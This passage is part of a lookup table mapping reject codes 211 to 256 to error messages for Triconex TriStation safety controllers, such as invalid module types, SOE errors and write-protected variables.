D3 | 211: 'The download time mismatches',
D4 | 212: 'Key setting prohibits this operation',
D5 | 213: 'Bad control program version',
D6 | 214: 'Command not in correct sequence',
D7 | 215: '<215>',
D8 | 216: 'Bad Index for a module',
D9 | 217: 'Module address is invalid',
DA | 218: '<218>',
DB | 219: '<219>',
DC | 220: 'Bad offset for an I/O point',
DD | 221: 'Invalid point type',
DE | 222: 'Invalid Point Location',
DF | 223: 'Program name is invalid',
E0 | 224: '<224>',
E1 | 225: '<225>',
E2 | 226: '<226>',
E3 | 227: 'Invalid module type',
E4 | 228: '<228>',
E5 | 229: 'Invalid table type',
E6 | 230: '<230>',
E7 | 231: 'Invalid network continuation',
E8 | 232: 'Invalid scan time',
E9 | 233: 'Load is busy',
EA | 234: 'An MP has re-educated',
EB | 235: 'Invalid chassis or slot',
EC | 236: 'Invalid SOE number',
ED | 237: 'Invalid SOE type',
EE | 238: 'Invalid SOE state',
EF | 239: 'The variable is write protected',
F0 | 240: 'Node number mismatch',
F1 | 241: 'Command not allowed',
F2 | 242: 'Invalid sequence number',
F3 | 243: 'Time change on non-master TRICON',
F4 | 244: 'No free Tristation ports',
F5 | 245: 'Invalid Tristation I command',
F6 | 246: 'Invalid TriStation 1131 command',
F7 | 247: 'Only one chassis allowed',
F8 | 248: 'Bad variable address',
F9 | 249: 'Response overflow',
FA | 250: 'Invalid bus',
FB | 251: 'Disable is not allowed',
FC | 252: 'Invalid length',
FD | 253: 'Point cannot be disabled',
FE | 254: 'Too many retentive variables',
FF | 255: 'LOADER_CONNECT',
(n/a) | 256: 'Unknown reject code'